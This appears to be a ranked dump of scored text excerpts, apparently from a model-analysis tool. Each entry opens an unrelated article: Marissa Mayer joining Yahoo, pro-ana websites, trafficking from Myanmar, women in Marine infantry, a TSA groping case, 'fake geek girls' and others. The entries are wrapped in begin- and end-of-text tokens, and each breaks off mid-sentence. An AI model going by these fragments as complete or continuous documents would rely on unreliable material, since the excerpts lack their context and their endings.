Medicaid itself, tying the amount it can spend to an inflation index that lags behind how much health care actually costs,” Vox’s Ezra Klein explains. This will involve converting Medicaid to a “per capita cap” system, which means states would only allot a fixed sum of money to each enrollee, instead of covering all their medical bills. “The result is Medicaid will be able to cover fewer people and cover +================================================================================ +Rank = 72; Score = 274432.0 +<|begin_of_text|>Marissa Mayer is leaving Google to become the new CEO of Yahoo. + +Photograph by Paul Zimmerman/Getty Images. + +One evening in the spring of 1999, Marissa Mayer got a recruiting email from a tiny search company. “I was in a long-distance relationship at the time, so I was pathetically eating a bad bowl of pasta in my dorm room by myself on a Friday night,” she once told me. Mayer was then a computer science graduate student at Stanford, and she’d been getting bombarded with offers from some of the world’s biggest tech firms. “I remember I’d told myself, ‘New emails from recruiters—just hit delete.’ ” But Mayer found Google interesting. She’d heard about the firm from one of her professors, and her graduate work—she’d been building a recommendation algorithm for Web pages—meshed with the company’s technological aims. + +On the day Mayer interviewed at Google, the company only had seven employees. Most of them were software engineers, and all of the engineers were men. Google’s founders, Larry Page and Sergey Brin, saw that Mayer would fit right in to the geeky boys’ club (during the interview, they all chatted about a data-analysis method known as k-means clustering), and they quickly offered her a job. Mayer, though, wasn’t instantly sold. + +“I had to think really hard about how to choose between job offers,” she said. Mayer approached the choice analytically. Over spring break, she studied the most successful choices in her life to figure out what they had in common. “I looked across very diverse decisions—everything from deciding where to go to school, what to major in, how to spend your summers—and I realized that there were two things that were true about all of them,” she said. “One was, in each case, I’d chosen the scenario where I got to work with the smartest people I could find. … And the other thing was I always did something that I was a little not ready to do. In each of those cases, I felt a little overwhelmed by the option. I’d gotten myself in a little over my head.” + +After weighing her options, Mayer chose Google. After an amazingly successful 13 years with the company, where she oversaw the look and feel of some of the company’s most high-profile products, she’s decided to move on. On Monday, Mayer announced that she’s going to become the new CEO of Yahoo. (She also revealed that she’s pregnant.) + +Deciding to lead +================================================================================ +Rank = 73; Score = 274432.0 +<|begin_of_text|>Anorexia nervosa is a mental illness characterised by a distorted body image, an extremely low body weight, and a fear of gaining weight. While anorexia affects all people, it is significantly more prevalent among women. Even though it is relatively rare, its effects are devastating. + +Anorexia is notoriously difficult to treat. Across all mental illnesses, it has the highest rate of mortality, so research in this area is crucial. + +It is not possible to determine a single cause of anorexia. Nevertheless, risk factors associated with the disease are well known. These include genetics, psychological predisposition, and social or cultural factors. + +Increasingly, our social and cultural interactions take place online. It is, therefore, not surprising that online interactions intersect with mental illnesses generally, and anorexia specifically. This is particularly when taking into account that the average person who suffers from anorexia tends to be relatively young. + +“Pro-ana” websites endorse anorexia as a positive choice, as opposed to a mental illness. Other variants include “pro-mia” websites, which endorse bulimia. These sites predominantly target women. + +They promote a very thin body as the type that women must have. They give advice about how to become anorexic, how to hide an eating disorder from others and how to diet. The websites contain images of extremely thin women, which are sometimes altered to make the women appear thinner. + +These websites have a long history. In 2001, Time Magazine noted the existence of 400 such sites. Efforts to eradicate these sites are just as old. AOL and Yahoo tried to ban pro-ana material that same year. + +These attempts have not been successful. Rather, the “survival” of such networks has required adaptation. + +In practice, this involves these networks “turning inwards”, as “subgroups of ana-mia bloggers will exchange messages, links and images among themselves and exclude other information sources”. Present estimates suggest there may be millions of pro-ana websites. + +Like other online interactions, pro-ana websites have become integrated with social media. + +The present legal framework + +In Australia, there is little regulation of pro-ana material. There are general criminal offences that relate to causing bodily harm. This includes causing a person to have a disease or disorder. It follows that anorexia, while a mental illness, might nevertheless constitute bodily harm. + +However, it is not likely that these offences will criminalise the publication of pro-ana material. The causes of anorexia are complex +================================================================================ +Rank = 74; Score = 274432.0 +<|begin_of_text|>Medieval sports were, for the most part, chances for men to practice their martial skills in less dangerous and destructive ways, and largely relegated women to the role of cheerleaders on the sidelines. There was one sport, however, that welcomed both men and women to the field (literally): falconry. + +Rooted in the ancient world, falconry was used for necessary hunting in the Middle Ages – such as finding food and killing vermin – but it was also an extremely popular sport for the nobility. Falcons and hawks were usually trained to hunt small prey, like rabbits and other birds, as they do in the natural world, but their training was sometimes expanded to include attacking larger prey, like deer, in order to weaken and distract the animals so that hunters and their dogs could finish them off (Stuhmiller, p.701). Unlike boar and stag hunting, falconry did not involve a face-to-face encounter with a dangerous and panicked animal, so it was a much safer sport for respectable medieval ladies to participate in: less physically demanding, less rushed, and less bloody. + +There was a wide range of birds for medieval people to train and use to hunt, including the gyrfalcon, goshawk, and sparrowhawk. A common bird for ladies to hunt with, though, was the peregrine falcon, and not just because grey goes with everything. Peregrines were a good choice for ladies because they are relatively small, therefore lighter to hold on the fist, and they are especially graceful in the air. Peregrines attack their prey by closing their talons into fists and diving, breaking the bones of other birds and knocking them out of the sky. This means that these falcons don’t often have the bloody, feather-shredding battles that some other raptors do (which could also be why some medieval men preferred the drama of hunting with bigger hawks). In order to accomplish this backbreaking feat, peregrines execute spectacular dives in excess of 300 kmph – they are the fastest creatures on the planet. Pretty awesome accessories for medieval ladies to wear on their arms, if you ask me. + +Because falconry allowed for women and men to spend the day riding sedately out into nature and having picnic lunches in full view of dozens of chaperones, it was the perfect opportunity – and excuse – for them to flirt and get to know each other. Soon enough, falconry became inextricably linked to romance, and no +================================================================================ +Rank = 75; Score = 274432.0 +<|begin_of_text|>Myanmar authorities have been able to rescue 102 victims of human trafficking from China so far this year, a police official on the Anti-Trafficking Task Force told 7Day. Legal action has also been taken against the 60 men and 114 women who were acting as brokers in the 70 cases that have been recorded since January. + +With only five male victims, women made up an overwhelming majority of the victims. Past reports show that female victims are forced to become sex workers, while men are used as laborers, and children as beggars. + +Despite the good news, activists feel that simply rescuing individuals from these situations is just the first step, and that more should be done to break the terrible cycle. + +Tun Tun, an anti-human trafficking activist currently working in China told 7Day: “To be honest, if these individuals did this [went to China] because they couldn’t find work here, then the government needs to help create jobs for them once they’re brought back [home]. Otherwise, these people will find another illegal way to go back to China, and when they go back, they’ll also take other women with them and act as their broker.” + +The majority of Myanmar victims are women who come from low-income families in remote villages. These women are promised better paying jobs by brokers, only to be sold off to Chinese farmers once they make it across the border. According to police reports, victims are ‘priced’ based on their age; women who are virgins are also priced higher than those who are not. + +When the one-child policy was still in place, Chinese men would take Myanmar brides and force them to get pregnant until they gave birth to a son. One victim who spoke to the Myanmar Times in 2013 said that the men would kill the child if it was a girl. + +An anti-human trafficking law was only first introduced in Myanmar in 2005. Despite increased efforts to prosecute offenders, many cases still remain unsolved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 76; Score = 272384.0 +<|begin_of_text|>Photo: Michael Segalov + +Theresa May, Donald Trump, Brexit, an uptick of racism and hate crimes, rising inflation, increasing property prices and the floundering pound. A lot has happened this year that you probably want to forget about, and the traditional way to forget – of course – is to drown your memory in booze, and stifle any remaining thoughts with one or more of your favourite drugs. + +But as you might have already surmised, that's not always the best course of action. Dr Sheri Jacobson, clinical director of Harley Therapy, points out that both drugs and alcohol actually provide a temporary high that, over a long-term basis, keeps the user in a cycle of low moods. + +"Alcohol, for example, is a depressant, and it actually messes with the neurotransmitters in your brain, including the one needed to help you keep anxiety at bay," she says. So while drinking is often thought of as a way to "wind down" after a demanding day, in fact it can have quite the opposite effect. + +"If you already had any kind of mental health issue, like anxiety or bipolar disorder, substances are likely to make your condition worse, not better," says Dr Jacobson. "And if you have a genetic risk for a mental disorder, drug or alcohol use gives you at a higher chance of developing it." + +Drug and alcohol misuse is particularly prevalent in men. In 2014, men accounted for approximately 65 percent of all alcohol-related deaths in the UK, and in 2014-2015, 74 percent of hospital admissions with a primary diagnosis of drug-related mental and behavioural disorders were men. Depression and anxiety are common in individuals with a history of substance abuse, and the Journal of Clinical Psychiatry suggests that one in three adults who abuses drugs or alcohol is also affected by depression. + +Male mental health might be more talked about than ever in the media, but last month the charities Mind and Rethink Mental Illness released a study from their campaign Time to Change showing that 54 percent of male teenagers suffering from mental health issues chose to keep their problems to themselves. Despite more and more celebrities outing themselves as sufferers of depression and anxiety, and media-run campaigns encouraging men to talk about what's troubling them, many are still keeping things to themselves. + +There are, of course, many reasons why that might be. But I'm personally aware of a number of men whose mental health problems have been clouded by pints, drugs, hangovers and comedowns +================================================================================ +Rank = 77; Score = 272384.0 +<|begin_of_text|>As a product of the University of California – Go Aggies! – I will tell you from first hand that the UC demographic is all Asian. As it stands, having four- to five-times the amount of Asians represented in California’s premier school system isn’t necessarily a bad thing. But the breakdown is certainly telling in terms of where balance is needed. In a state funded education system where Asians make up only 12.4% of California’s population, Asians make up 40% of the university’s student body. + +To address the imbalance, UC regents have decided to relax admission standards in order to expand the UC applicant pool. + +As it stands, Fall 2008 admissions data from UC schools indicate the following breakdown: + +University of California, Berkeley + +Asian-American: 46% + +White: 30.2% + +Latino: 11.5% + +African-American: 3.7% + +University of California, Los Angeles + +Asian-American: 38% + +White: 34% + +Latino: 15% + +African-American: 3% + +University of California, Davis + +Asian-American: 42% + +White: 36% + +Latino: 12% + +African-American: 3% + +University of California, Irvine + +Asian-American: 51% + +White: 24% + +Latino: 12% + +African-American: 2% + +University of California, Santa Barbara + +Asian-American: 19% + +White: 53% + +Latino: 19% + +African-American: 3% + +Effective in 2012, UC Regents have changed the admissions requirements and process to drop the SAT subject test (SAT II) and to extend automatic admissions to the 91st percentile of California high school students. + +Applicants are currently required to maintain a certain GPA and SAT composite score that combines SAT and SAT II scores in order to qualify for UC. The new requirements will lax the current standards. But UC estimates the new changes would qualify 1,800 more black, 7,500 more Latinos, 15,000 more whites, and 4,000 Asian-American students. + +Although the test is aimed to increase UC’s applicant pool, Asian- and African-American students benefit the least. Especially since Asian-Americans perform better on the soon-to-be dropped SAT II subject test and other minority and white students perform better on the SAT (I) reasoning test, Asian American political pundits suggest the new requirements will greatly reduce the number of Asian Americans in UCs. + +Further, the Asian-American community is most outraged in UC’s lack of outreach +================================================================================ +Rank = 78; Score = 272384.0 +<|begin_of_text|>Neal Cassady won't go away. The wild young man dashing madly down the highways of experience, liberated from conventional restraints and searching for sex and salvation in the American night, sent chills of horror down the spine of respectable society in 1957, when Kerouac immortalized him as Dean Moriarty in On the Road. A few years later, just when America thought it was safe to drive again, he came roaring back, in the flesh this time and crazier than ever, as the pilot of the bus Ken Kesey and his "Merry Pranksters" took cross-country in the psychedelic 60s. His mad appetite for pleasure and his speed-crazed monologues, recounted faithfully by Tom Wolfe in The Electric Kool-Aid Acid Test, made him a counterculture folk hero. Survivors of that era still speak and write of him with reverence. + +Cassady has insinuated himself into the popular imagination beyond the wildest dreams of even his most ardent admirers. Think of the mythologized passions and highway death of James Dean, the apocalyptic persona and imagery of Jim Morrison, and the more recent road-to-the-promised-land visions of Springsteen and his various clones. Several generations of movie and TV roadrunners, from the adventure seekers on Route 66 through the postapocalyptic mutants of Road Warrior, have gotten much of their fuel from Neal at the wheel of his endless succession of gas-guzzling chariots. + +Yet the "real" Cassady has remained elusive. As powerful as his personality was, he's come to seem ephemeral, an empty mirror in which everyone saw images of his or her own choosing. Even Cassady's most devoted disciples remember him selectively. Allen Ginsberg has said that Ken Babbs, a Kesey associate and an editor at Kesey's journal Spit in the Ocean, once turned down a manuscript Ginsberg submitted describing the first time he and Cassady slept together. Babbs apparently wanted nothing to interfere with his cherished image of Cassady as heroic heterosexual. + +Most of the Cassady legend has consisted of fictionalized or anecdotal accounts, set in a romanticized Beat or hippie era and usually related by adoring acolytes, mostly men. Women--whether Cassady's innumerable girlfriends and three wives or female critics unimpressed by his exploits as cocksman extraordinaire--have by and large remained pointedly silent. + +That silence has now been broken by Carolyn Cassady, Neal's +================================================================================ +Rank = 79; Score = 272384.0 +<|begin_of_text|>Field Notes: Meet Honolulu’s Competitive Gamers + +Field Notes explores Honolulu’s vast and varied scenes and subcultures. This month we meet the guys who make money playing video games. + +By Gus Downes + +Photos: Aaron Yoshino + +WHAT THEY DO + +Last October, 40,000 people packed Sangam Stadium in Seoul to watch two teams compete for a $1 million prize. The event? The League of Legends world championship tournament, complete with rock bands, orchestra and fireworks. Multiplayer online gaming is huge worldwide, but nowhere bigger than South Korea, where Chung-Ang University even awards scholarships to top video gamers. + +Honolulu’s equivalent scene lives primarily at a 2,100-square-foot storefront in ‘Aiea, run by Devin Wolery. With the help of a small, active core of employees, PC Gamerz puts on e-sport tournaments at his LAN Center. That’s LAN, as in local area network, which guarantees speedy gameplay by keeping the network small. That’s valuable in games where milliseconds mean the difference between winning and losing. + +Tournaments are held at the ‘Aiea storefront, in the corner of the Ala Moana Microsoft Store and, twice a year, at Hot Import Nights. Teams of four or five sit next to each other, staring at high-definition computer monitors and shouting enemy positions in shorthand that is unintelligible to the uninitiated. + +Wolery, 31 years old, with spiked hair and black-rimmed glasses, has been the driving force in building the local professional gaming scene. When he was 18, Wolery got kicked out of his charter school in Sacramento, Calif. for hacking into his school’s computers. He was unimpressed by their computer security. “The password was ‘charter’ spelled backwards,” he says. After moving to Hawai‘i, he started working 40 hours a week at Circuit City and spending another 40 hours a week playing video games. His father noticed, opened PC Gamerz and put Wolery in charge. Now, he’s running video-game tournaments that draw in a diverse group of 20-something-year-old men. + +THE GAMES + +The most popular game, by far, is League of Legends. Wolery says players log 9,000 hours of the game each month at his store (compared to 1,200 hours for the next three games combined). In the game, players control one of dozens of “champions,” characters with different attributes and attacks. Five-man teams battle each +================================================================================ +Rank = 80; Score = 270336.0 +<|begin_of_text|>OREM — A group of Brigham Young University students recently used a popular dating application to perform a social experiment on unsuspecting fellow students in Utah Valley. + +Tinder, a mobile dating application for iPhones, has exploded in popularity in recent months. Users swipe through profile pictures of people near them, indicating when they are interested in another person. If the interest is mutual, the two are able to contact one another. + +The app has enough of a following at BYU to have garnered an article in the school's paper about it. Its success in Provo led three BYU students to ask a question: How many men would show up to meet a girl with whom they had had only the briefest of interactions? + +"We weren't sure we'd be willing to do it … We didn't think that many people would. And we were proven wrong," Bowman Bagley, a junior at the school, told the Huffington Post. + +Tinder requires a Facebook profile to log in, so Bagley and his roommates set up an account for a fake 21-year-old named Sammy. They uploaded a few photos taken from Miss Teen USA Kendall Fein's online profile and spent an hour "liking" every guy the app showed them. + +About 250 people were matched with "Sammy," and the roommates messaged each of them about a potential date. + +"I'm going to yogurt shop called yogurtland tonight at 9 in orem with some girl friends if you want to meet up ;)" Sammy wrote. + +Photo: alittlebitoflizzy.wordpress.com + +What happened was something no one expected: about six dozen men showed up at the frozen yogurt shop to meet the fictional young woman. What happened next was described on the blog of a student with a connection to Bagley: + +"We walked toward the door to see groups and groups and groups of guys getting out of their cars, hustling into the building. I could not believe it! They were swarming! Literally swarming!" the blogger, who describes herself as a friend of a friend of Bagley's, wrote. + +"Some were waiting outside, trying to look casual.... Some groups were standing together, looking around, looking cool… Picture a wall full of men standing in a yogurt shop on a Thursday night, with no intent of tasting the yogurt," she continued. + +Bagley told the Huffington Post by the time he deleted the fake profile two days later, he had received multiple messages from those he had fooled — some who had missed out on Yogurtland and wanted to make it up on +================================================================================ +Rank = 81; Score = 270336.0 +<|begin_of_text|>Bisexuality is the tendency to be sexually attracted to both men and women. To some, this may sound like a superpower doubling one's romantic options (and odds). But in real life, bisexuality can be an awkward to have, creating a challenge truly fitting in with either the “straight" or LGBT communities. + +But most important, bisexuality tends to be quite misunderstood. + +Myths and stereotypes about bisexuality abound, some even contradicting one another. Straight and LGBT people alike can hold such stereotypes, compounding the difficulties bisexual people can have fitting in. Luckily, an increasing number of researchers have been producing research improving our of bisexuality. + +Here are three examples of how science has worked to combat misconceptions about bisexuality: + +Myth 1: "There's no such thing as bisexuality." + +This is especially laughable. How can you tell a group of individuals that they don’t exist? But the idea that all people have to be either straight or gay is pervasive and persistent, especially when it comes to men. Frustratingly, even within the most LGBT-friendly circles, you encounter the idea that “there’s no such thing as a bisexual man.” + +Researchers have quite clearly laid this myth to rest with a study recently published in the Archives of Sexual Behavior(1). Researchers recruited straight, gay, and bisexual men, and exposed them to a variety of erotic film clips. Not only were participants asked to rate their subjective feelings of arousal in response to the clips, they were also connected to physiological equipment that measured changes in genital arousal. As would be expected, heterosexual men responded with much more subjective and genital arousal to films containing women rather than men, and vice versa for gay men. However, bisexual men were aroused relatively similarly by videos of both men and women. They were also more aroused by bisexual clips—for example, two men and one woman—than were the other two groups. Importantly, these differences were in both their reported arousal and the objective measurement of their genital arousal. It is clear from this study that these individuals were not “pretending” to be bisexual. + +Myth 2: "Bisexuality is just a phase." + +With this myth, bisexuality is represented as a state of experimentation or confusion—stereotypically experienced during the college years—that occurs before a person settles on their “true” identity. + +Lisa Diamond has conducted some very sophisticated work on this topic, in which she examined the sexual identities of women over long periods of time. In a +================================================================================ +Rank = 82; Score = 270336.0 +<|begin_of_text|>For all his grandiose writing about the way things work, Aaron Sorkin has managed to avoid some unpleasant truths despite the many, many efforts made to educate him over the years. But he understands now. + +Variety reports that Sorkin appeared on a panel Saturday at the Writers Guild Festival, moderated by film critic Elvis Mitchell. It appears he was astounded by the notion that white men receive more second chances when they make just so-so movies, when women and minorities find it difficult to even make that first film: + +“Are you saying that women and minorities have a more difficult time getting their stuff read than white men and you’re also saying that [white men] get to make mediocre movies and can continue on?” he asked the audience. + +Throughout the discussion Sorkin returned to this baffling notion, though he insisted that Hollywood is a meritocracy and that he has been unaware of any diversity issue. “You’re saying that if you are a woman or a person of color, you have to hit it out of the park in order to get another chance?” Sorkin demanded, perhaps hoping everyone would see he was speaking truth to power. + +Mitchell apparently joked that Sorkin was making the common mistake of confusing “meritocracy with meretricious,” but to no avail. Sorkin was quick to remind everyone that Lena Dunham and Jordan Peele exist. There’s no report of how Sorkin came around, but he eventually offered to “help” with the diversity issues he just sort of agreed to acknowledge: + +“What can I do [to help]?” Sorkin said. “I do want to understand what someone like me can do … but my thing has always been: ‘If you write it, they will come.’” + +Advertisement + +Ah, the Field of Dreams diversity initiative.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 83; Score = 268288.0 +<|begin_of_text|>We’re all getting fatter, but Irish men are getting fatter fastest. The prognosis is poor: by 2030, 58 per cent of Irish men are expected to be obese, topping the scale of all European countries, according to a UK-based study published last year. If you add the projected number of overweight men to the Irish total, the figure is even worse, coming in at a gut-busting 90 per cent. + +Now a new review of men’s food behaviour by Safefood, the all-Ireland health body, shows that we’re well on our way to fulfilling that frightening prediction. It points out that 70 per cent of men in the Republic are currently overweight or obese, compared with 50 per cent of women, as are 69 per cent of men in the North, against 57 per cent of women. + +The big question, of course, is why. What is it about living on this island that makes Irish men, in particular, stuff themselves silly, with so little regard for the health consequences? + +Many reasons – from simple greed or laziness, to more complex speculations about how men respond to stress, or marriage, or whether they are especially sensitive to the effects of chemicals such as phthalates, commonly found in household products – have been forwarded for male weight gain. + +Dr Aileen McGloin, from Safefood, has a list of contributing factors as long as your arm, all of which, it seems, can be summed up by one single sentence. “Men,” she says, “live in a different food world.” + +A different food world? Hang on, don’t we all occupy the same universe of choices, populated by temptations like fat-laden ready-meals and sneaky snacks under the desk at work? But McGloin says that men’s experience of eating, and all that goes with it – the shopping, the preparation, the amount they actually consume – is often markedly different to how women encounter their food. + +Men are more likely to eat larger portions, they’re less likely to be aware of healthy eating guidelines, and many don’t regard eating well as an important factor in their long-term health. + +Is it just about complacency then? Even ignorance? McGloin isn’t keen to be so judgmental. Rather, she says, it’s a matter of cultural conditioning, right from the start. + +“You have to be careful about over-generalising, but men are less likely to learn about food in childhood, so they sometimes come into adulthood without +================================================================================ +Rank = 84; Score = 266240.0 +<|begin_of_text|>Four years after the sleeper hit Pyaar Ka Punchnama detailed the travails of three harried men and their harridan women, writer and director Luv Ranjan is back with a new set of adventures about three harried men and their harridan women. + +Now, as then, three flatmates acquire girlfriends and live to rue the day. Siddharth (Sunny Singh Nijar) becomes butler, driver and handyman to his beloved Supriya (Sonalli Sehgall), who cannot bring herself to tell her family that she loves him. Tarun (Omkar Kapoor) and Kusum (Ishita Sharma) appear to be a perfect match until she starts maxing out his credit cards and interfering with his business plans. Anshul (Karthik Aaryan) adores the flitty Ruchika (Nushrat Bharucha), but she treats him like one of her designer handbags and loves her male BFF more. + +Except for Nijar and Kapoor, all the other actors are repeats from the first film. Anshul and Ruchika were also paired in the original, and though they are new characters here, their many lows and fleeting highs are all too familiar. Pyaar Ka Punchnama 2 could have revisited their relationship, but it would have meant making Ruchika more human and less of a screeching stereotype – not a prospect entertained by this cautionary tale of male emasculation, which doubles up as a call to arms for men in the ongoing battle of the sexes. + +What appears to have changed since 2011 is the budget for sets and costumes. The trio's apartment is a marked upgrade from the crummy digs featured in the first film. Ruchika is straight out of a fashion magazine catalogue and furiously pouts and preens, waves her painted talons about, and has a closet packed with minuscule dresses. When the couples decide to head out on an ill-advised vacation together, they fly to Thailand. The first movie was happy to swell the ranks of Goan tourists. + +Die, women, die! + +The economy might have improved, but the value system remains stuck in a mythical golden past when men dictated the rules of sexual engagement. The screenplay proceeds as a series of sketches and anecdotes. Some of them are funny enough, but each makes the same point as the first film: modern men are treated like dogs by women (a song to this effect is borrowed from part one), +================================================================================ +Rank = 85; Score = 266240.0 +<|begin_of_text|>U.S. Marines from Delta Company, Infantry Training Battalion, School of Infantry-East navigate their way through the obstacle course aboard, Camp Geiger, N.C., Oct. 04, 2013. Delta Company is the first company at center with female students. (Photo: Warrant Officer Paul Mancuso, U.S. Marines) Story Highlights Thirteen women taking the latest infantry course + +Services must open combat roles to women who qualify + +One test: Carrying an 85-lb. pack for 10 kilometers or more + +CAMP GEIGER, N.C. — Mist clings to the ground and the sun won't make an appearance for another three hours. The 263 Marines of Delta Company, Infantry Training Battalion, shoulder their bulky packs and set off. + +The air is still cool, but 85-pound packs are heavy. Soon the Marines are sweating through their camouflage uniforms and noncommissioned officers are moving between the two files of Marines, shouting encouragement and encouraging stragglers to keep up. + +The Marine Corps has been training infantrymen here since 1953. This year is different. Among Delta Company's 263 Marines are 13 women who have volunteered to participate in a closely watched experiment into the feasibility of integrating females into the infantry. The infantry is among a handful of military jobs that remain male-only preserves. + +The women, who are shouldering the same packs and wearing the same combat uniforms as the men, are barely distinguishable from the men as they trudge in the darkness. + +"We treat everyone the same," said Staff Sgt. Billy Shinault, a Marine instructor who chatted while working a bolt of chewing tobacco after the hike. "We would be doing them a disservice to lower the standards." + +Shortly before he left office earlier this year, Defense Secretary Leon Panetta ordered the military to lift the ban on women serving in ground combat specialties, such as the infantry and special operations. He left it up to the services to figure out how to put the order into effect. The services have until January 2016 to do so. Exceptions would require approval of the defense secretary. + +Women have been serving in plenty of jobs that have exposed them to combat over the past decade in Iraq and Afghanistan. But ground combat jobs have remained off-limits. These jobs require physical strength, feats of endurance and spending a long time in primitive field conditions. + +The infantry is the leading edge of the ground combat specialties. Its mission is as basic as it is elemental. Infantrymen carry what they need on their backs +================================================================================ +Rank = 86; Score = 262144.0 +<|begin_of_text|>The storage facility of prohibited items collected at Newark Liberty International Airport (Photo by Katherine Frey/The Washington Post) + +CJ Ciaramella is a reporter at the Washington Free Beacon and a contributor to Vice. + +If the past 10 years have taught us anything, it’s that, one way or another, the TSA is going to get at your crotch. The latest data point comes from Denver, courtesy of CBS4: + +A CBS4 investigation has learned that two Transportation Security Administration screeners at Denver International Airport have been fired after they were discovered manipulating passenger screening systems to allow a male TSA employee to fondle the genital areas of attractive male passengers. + +Apparently, the two screeners, one male and the other female, worked out a system. The female screener operating the body scanner would misidentify attractive men as women on the scanner, so that the machine would flag the extra, uh, bulk in their groin area, which then initiated a pat-down from her partner in lechery. + +I once had a similar experience at a TSA checkpoint. I had thoroughly emptied my pockets, but the body scanner nevertheless detected an object in my pants. Fortunately, my TSA agent did not appear to take any pleasure in the business and went about his duty with grim professionalism. + +At the time, I was merely annoyed at the inconvenience, not to mention the poor performance of the taxpayer-funded $170,000 millimeter wave scanner that I had assumed was able to tell the difference between a brick of C-4 and genitals. It turns out those scanners have never stopped a terrorist, but maybe one day the TSA screeners will inadvertently catch a cute jihadist. + +It’s a sign of just how resigned we’ve become to the TSA’s existence that most of the men getting felt up probably shrugged it off and thought, “Well, that’s the TSA for you.” We’ve become desensitized to being scanned and prodded and told our toothpaste is too large and must therefore be confiscated in the name of national security. TSA’s expansion of its PreCheck program and an announcement that it would stop searching black women’s hair for weapons are what pass for progress. + +This is a raw deal. The federal government heaped a mountain of farcical security measures on the American public after 9/11, and now we’re supposed to give them a thumbs up for no longer taking nude photos of us and stealing pregnant ladies’ insulin. + +Mind you, this is an agency that regularly employs kleptos and perverts, an agency that handed out security badges to +================================================================================ +Rank = 87; Score = 262144.0 +<|begin_of_text|>Science fiction is no longer a boy’s game, if it ever was, as the thousands of women who attended this year's San Diego geekfest Comic-Con can attest. Women are watching, writing, acting in and making sci fi and fantasy – and, if you believe the men behind the "Fake Geek Girls" movement, they’re just doing it for male attention. + +When graphic novelist Tony Harris posted an angry screed on Facebook, decrying the conventionally pretty women who attend conventions in the hopes of snaring an unsuspecting young nerd to toy with, the fake geek girl meme went viral. Harris was simply repeating an argument that has been doing the rounds for years – the "booth babes" and scantily-clad fangirls are there not because they genuinely like science fiction, but to attract men they’d normally never look twice at. One of the biggest targets has been cosplay – what the non-nerdy might term "dressing up". Whilst male fans are free to show up dressed as the Dark Knight himself, attend a con in Catwoman’s leathers and you must be doing it for male attention. A man can wear a bow tie and a fez and he’s in costume. A woman can spend hundreds of pounds or weeks of her time on an exact replica of an outfit a minor character wore onscreen for five minutes, whilst reciting the Prime Directive in Klingon, and she’s an attention-seeking slut. For a subculture that prides itself on individuality, that sounds an awful lot like mainstream misogyny. + +Geekdom is a competitive sphere, whatever your gender. Obscure facts become currency, traded for acceptance or a place in the hierarchy. Fans who come on board at the height of a show’s popularity are looked down upon, because they don’t know the pain of living through those arid, TARDIS-less years between McCoy and Eccleston with only Paul McGann to alleviate the tedium. Women in particular are seen as jumping on a bandwagon, appropriating geek chic – just like female football fans, they’re only interested in the hero’s physique. + +Women’s engagement with media has always been trivialised, from the eighteenth century scorn heaped upon novels to the dismissal 